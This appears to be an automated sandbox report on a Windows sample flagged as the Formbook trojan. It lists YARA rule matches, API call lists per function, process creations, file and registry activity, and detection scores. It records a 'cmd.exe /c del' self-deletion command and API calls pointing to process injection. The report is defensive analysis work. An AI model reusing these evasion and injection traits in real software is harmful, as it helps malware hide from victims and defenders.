      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_00403235
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_004066665_2_00406666
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_6FE91A985_2_6FE91A98
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D674B115_2_00D674B1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D7487515_2_00D74875
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D64C1015_2_00D64C10
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D6540A15_2_00D6540A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D8419115_2_00D84191
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D8695A15_2_00D8695A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D6914415_2_00D69144
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D74EC115_2_00D74EC1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D8769E15_2_00D8769E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D75A8615_2_00D75A86
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D73EB315_2_00D73EB3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D66E5715_2_00D66E57
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D6D66015_2_00D6D660
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D83E6615_2_00D83E66
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D6EE0315_2_00D6EE03
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D67A3415_2_00D67A34
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D70BF015_2_00D70BF0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D7074015_2_00D70740
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D66B2015_2_00D66B20
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE138015_2_03AE1380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAF33015_2_03BAF330
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFE31015_2_03AFE310
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADD2EC15_2_03ADD2EC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA124C15_2_03BA124C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B1E015_2_03B0B1E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF51C015_2_03AF51C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8D13015_2_03B8D130
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB010E15_2_03BB010E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADF11315_2_03ADF113
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B3717A15_2_03B3717A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE00A015_2_03AE00A0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B2508C15_2_03B2508C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA70F115_2_03BA70F1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFB0D015_2_03AFB0D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9E07615_2_03B9E076
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF276015_2_03AF2760
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFA76015_2_03AFA760
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA675715_2_03BA6757
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF068015_2_03AF0680
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAF6F615_2_03BAF6F6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEC6E015_2_03AEC6E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B636EC15_2_03B636EC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAA6C015_2_03BAA6C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8D62C15_2_03B8D62C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0C60015_2_03B0C600
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1467015_2_03B14670
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9D64615_2_03B9D646
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAF5C915_2_03BAF5C9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA75C615_2_03BA75C6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BBA52615_2_03BBA526
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF044515_2_03AF0445
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B64BC015_2_03B64BC0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAFB2E15_2_03BAFB2E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0B1015_2_03AF0B10
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0FAA015_2_03B0FAA0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAFA8915_2_03BAFA89
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BACA1315_2_03BACA13
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAEA5B15_2_03BAEA5B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEE9A015_2_03AEE9A0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAE9A615_2_03BAE9A6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B359C015_2_03B359C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B698B215_2_03B698B2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0688215_2_03B06882
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA78F315_2_03BA78F3
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA18DA15_2_03BA18DA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF28C015_2_03AF28C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9083515_2_03B90835
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E81015_2_03B1E810
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF380015_2_03AF3800
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0B87015_2_03B0B870
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD686815_2_03AD6868
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAF87215_2_03BAF872
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF987015_2_03AF9870
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAEFBF15_2_03BAEFBF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF6FE015_2_03AF6FE0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA1FC615_2_03BA1FC6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFCF0015_2_03AFCF00
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAFF6315_2_03BAFF63
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA0EAD15_2_03BA0EAD
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF1EB215_2_03AF1EB2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE2EE815_2_03AE2EE8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA9ED215_2_03BA9ED2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B90E6D15_2_03B90E6D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B10E5015_2_03B10E50
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B02DB015_2_03B02DB0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B8FDF415_2_03B8FDF4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF9DD015_2_03AF9DD0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAFD2715_2_03BAFD27
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEAD0015_2_03AEAD00
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF0D6915_2_03AF0D69
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA7D4C15_2_03BA7D4C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B89C9815_2_03B89C98
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0FCE015_2_03B0FCE0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BBACEB15_2_03BBACEB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B08CDF15_2_03B08CDF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFAC2015_2_03AFAC20
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE0C1215_2_03AE0C12
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF3C6015_2_03AF3C60
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA6C6915_2_03BA6C69
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BAEC6015_2_03BAEC60
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9EC4C15_2_03B9EC4C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEE81A15_2_02DEE81A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEE10A15_2_02DEE10A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DD9E6015_2_02DD9E60
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DD2FB015_2_02DD2FB0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEE4D915_2_02DEE4D9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03B5E692 appears 84 times
      Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03ADB910 appears 266 times
      Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03B37BE4 appears 88 times
      Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03B6EF10 appears 105 times
      Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03B25050 appears 36 times
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D69458 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,15_2_00D69458
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D764CA NtQueryInformationToken,15_2_00D764CA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D87460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,15_2_00D87460
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D7643A NtOpenThreadToken,NtOpenProcessToken,NtClose,15_2_00D7643A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D74823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,15_2_00D74823
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D8C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,15_2_00D8C1FA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D76500 NtQueryInformationToken,NtQueryInformationToken,15_2_00D76500
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D8A135 NtSetInformationFile,15_2_00D8A135
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D64E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,15_2_00D64E3B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D74759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,15_2_00D74759
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B234E0 NtCreateMutant,LdrInitializeThunk,15_2_03B234E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22B90 NtFreeVirtualMemory,LdrInitializeThunk,15_2_03B22B90
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22B80 NtCreateKey,LdrInitializeThunk,15_2_03B22B80
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22BC0 NtQueryInformationToken,LdrInitializeThunk,15_2_03B22BC0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22A80 NtClose,LdrInitializeThunk,15_2_03B22A80
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B229F0 NtReadFile,LdrInitializeThunk,15_2_03B229F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22F00 NtCreateFile,LdrInitializeThunk,15_2_03B22F00
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22E50 NtCreateSection,LdrInitializeThunk,15_2_03B22E50
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_03B22DC0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22D10 NtQuerySystemInformation,LdrInitializeThunk,15_2_03B22D10
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22CF0 NtDelayExecution,LdrInitializeThunk,15_2_03B22CF0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22C30 NtMapViewOfSection,LdrInitializeThunk,15_2_03B22C30
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B24260 NtSetContextThread,15_2_03B24260
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B24570 NtSuspendThread,15_2_03B24570
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22BE0 NtQueryVirtualMemory,15_2_03B22BE0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22B20 NtQueryInformationProcess,15_2_03B22B20
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22B10 NtAllocateVirtualMemory,15_2_03B22B10
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22B00 NtQueryValueKey,15_2_03B22B00
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22AA0 NtQueryInformationFile,15_2_03B22AA0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22AC0 NtEnumerateValueKey,15_2_03B22AC0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22A10 NtWriteFile,15_2_03B22A10
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B229D0 NtWaitForSingleObject,15_2_03B229D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B238D0 NtGetContextThread,15_2_03B238D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22FB0 NtSetValueKey,15_2_03B22FB0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22F30 NtOpenDirectoryObject,15_2_03B22F30
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22EB0 NtProtectVirtualMemory,15_2_03B22EB0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22E80 NtCreateProcessEx,15_2_03B22E80
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22ED0 NtResumeThread,15_2_03B22ED0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22EC0 NtQuerySection,15_2_03B22EC0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22E00 NtQueueApcThread,15_2_03B22E00
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22DA0 NtReadVirtualMemory,15_2_03B22DA0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22D50 NtWriteVirtualMemory,15_2_03B22D50
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B23C90 NtOpenThread,15_2_03B23C90
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22CD0 NtEnumerateKey,15_2_03B22CD0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B23C30 NtOpenProcessToken,15_2_03B23C30
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22C20 NtSetInformationFile,15_2_03B22C20
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22C10 NtOpenProcess,15_2_03B22C10
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B22C50 NtUnmapViewOfSection,15_2_03B22C50
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEA360 NtCreateFile,15_2_02DEA360
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEA490 NtClose,15_2_02DEA490
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEA410 NtReadFile,15_2_02DEA410
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEA48A NtClose,15_2_02DEA48A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D64C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,15_2_00D64C10
      Source: jU0hAXFL0k.exe, 00000005.00000000.2063367324657.000000000043A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeskatologiskes outsubtle.exe4 vs jU0hAXFL0k.exe
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edgegdi.dllJump to behavior
      Source: jU0hAXFL0k.exeStatic PE information: invalid certificate
      Source: jU0hAXFL0k.exeVirustotal: Detection: 45%
      Source: jU0hAXFL0k.exeReversingLabs: Detection: 31%
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile read: C:\Users\user\Desktop\jU0hAXFL0k.exeJump to behavior
      Source: jU0hAXFL0k.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\jU0hAXFL0k.exe C:\Users\user\Desktop\jU0hAXFL0k.exe
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeProcess created: C:\Users\user\Desktop\jU0hAXFL0k.exe C:\Users\user\Desktop\jU0hAXFL0k.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jU0hAXFL0k.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeProcess created: C:\Users\user\Desktop\jU0hAXFL0k.exe C:\Users\user\Desktop\jU0hAXFL0k.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jU0hAXFL0k.exe"Jump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_00403235
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\KoalitionensJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Local\Temp\nsm756E.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@446/13@24/12
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_00402138 LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,5_2_00402138
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_004044FA GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,5_2_004044FA
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:304:WilStaging_02
